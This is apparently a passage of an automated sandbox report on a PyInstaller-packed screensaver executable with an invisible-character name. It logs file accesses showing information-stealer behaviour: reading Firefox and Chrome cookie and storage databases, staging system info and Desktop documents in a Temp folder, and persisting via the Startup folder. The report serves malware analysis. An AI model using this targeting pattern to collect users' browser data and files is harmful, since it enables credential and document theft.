Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \System\Antivirus.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \System\System Info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
